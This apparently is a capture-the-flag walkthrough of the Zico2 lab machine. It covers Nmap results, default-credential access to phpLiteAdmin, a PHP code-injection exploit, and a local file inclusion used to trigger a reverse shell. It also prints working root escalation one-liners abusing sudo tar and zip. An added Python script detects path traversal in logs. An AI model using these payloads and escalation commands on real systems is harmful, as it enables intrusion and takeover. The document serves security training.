Nmap
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 68:60:de:c2:2b:c6:16:d8:5b:88:be:e3:cc:a1:25:75 (DSA)
| 2048 50:db:75:ba:11:2f:43:c9:ab:14:40:6d:7f:a1:ee:e3 (RSA)
|_ 256 11:5d:55:29:8a:77:d8:08:b4:00:9b:a3:61:93:fe:e5 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Zico’s Shop
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 33247/udp status
| 100024 1 37566/tcp status
| 100024 1 47961/udp6 status
|_ 100024 1 60994/tcp6 status
37566/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:7E:4A:E2 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32-3.5
Uptime guess: 198.839 days (since Fri Mar 22 16:33:11 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
I found the HTTP port to be useful, so let's start enumerating with it. While using dirsearch I found many useful directories, and one of them had phpLiteAdmin running on it.

At daadmin I found phpLiteAdmin running.

I logged in using the default creds “admin” and got access to it, then followed a phpLiteAdmin exploit from exploit-db:
1. We create a db named "hack.php".
(Depending on Server configuration sometimes it will not work and the name for the db will be "hack.sqlite". Then simply try to rename the database / existing database to "hack.php".)
The script will store the sqlite database in the same directory as phpliteadmin.php.
Preview: http://goo.gl/B5n9O
Hex preview: http://goo.gl/lJ5iQ
2. Now create a new table in this database and insert a text field with the default value:
<?php phpinfo()?>
Hex preview: http://goo.gl/v7USQ
3. Now we run hack.php
Done!
Proof: http://goo.gl/ZqPVL
I created a new database as per the exploit, but added a reverse shell instead of <?php phpinfo()?>
I got the reverse shell through the LFI I found at “10.0.0.10/view.php?page=../../../../../../../etc/passwd”: I just replaced it with “10.0.0.10/view.php?page=../../../../../../../usr/databases/hack.php” and started nc on my local host.
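
For the defending side, here is how the two view.php requests above show up in a web access log. This is an added example, not part of the original write-up: the log lines are constructed, and WEB_ROOT, the tools.html request and the double-encoded variant are assumptions.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

WEB_ROOT = "/var/www"  # assumption: directory view.php includes files from
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (client IP, timestamps and sizes are made up).
SAMPLE_LOG = [
    '10.0.0.5 - - [07/Oct/2019:10:00:01 +0000] "GET /view.php?page=tools.html HTTP/1.1" 200 8355',
    '10.0.0.5 - - [07/Oct/2019:10:02:13 +0000] "GET /view.php?page=../../../../../../../etc/passwd HTTP/1.1" 200 1509',
    '10.0.0.5 - - [07/Oct/2019:10:09:40 +0000] "GET /view.php?page=../../../../../../../usr/databases/hack.php HTTP/1.1" 200 312',
    '10.0.0.5 - - [07/Oct/2019:10:11:02 +0000] "GET /view.php?page=%252e%252e%252f%252e%252e%252fetc%252fshadow HTTP/1.1" 200 0',
]

def fully_decode(value, max_rounds=5):
    """Percent-decode until stable so double-encoded ../ is caught too."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def escaped_target(log_line, param="page"):
    """Return the path `param` resolves to if it leaves WEB_ROOT, else None."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    # parse_qs decodes once; fully_decode removes any further encoding layers.
    values = parse_qs(urlsplit(match.group(1)).query).get(param)
    if not values:
        return None
    value = fully_decode(values[0]).replace("\\", "/")
    resolved = posixpath.normpath(posixpath.join(WEB_ROOT, value))
    inside = resolved == WEB_ROOT or resolved.startswith(WEB_ROOT + "/")
    return None if inside else resolved

def scan(lines):
    """Return (line number, resolved path) for every request that escapes."""
    return [(n, hit) for n, line in enumerate(lines, 1)
            if (hit := escaped_target(line)) is not None]

if __name__ == "__main__":
    for n, path in scan(SAMPLE_LOG):
        print(f"line {n}: page parameter resolves outside {WEB_ROOT}: {path}")
```

The same resolve-then-compare check, applied inside view.php before the include, is what stops both the /etc/passwd read and the include of a database file stored outside the web root.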

Then I got a proper shell using python -c 'import pty;pty.spawn("/bin/bash")', moved to the home directory of the zico user and found a wordpress folder. I found zico's password in /home/zico/wordpress/wp-config.php and switched to the zico user using the password “sWfCsfJSPV9H3AmQzw8”.

Luckily, I found zico to be a sudo user
zico@zico:~/wordpress$ sudo -l
sudo -l
Matching Defaults entries for zico on this host:
env_reset, exempt_group=admin,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User zico may run the following commands on this host:
(root) NOPASSWD: /bin/tar
(root) NOPASSWD: /usr/bin/zip
zico@zico:~/wordpress$
Then I used the tar command to escalate privileges
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

Got root user

ANOTHER WAY TO ROOT USING ZIP COMMAND
Used
TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF
And got root

……………………………….COWABUNGA……………………………………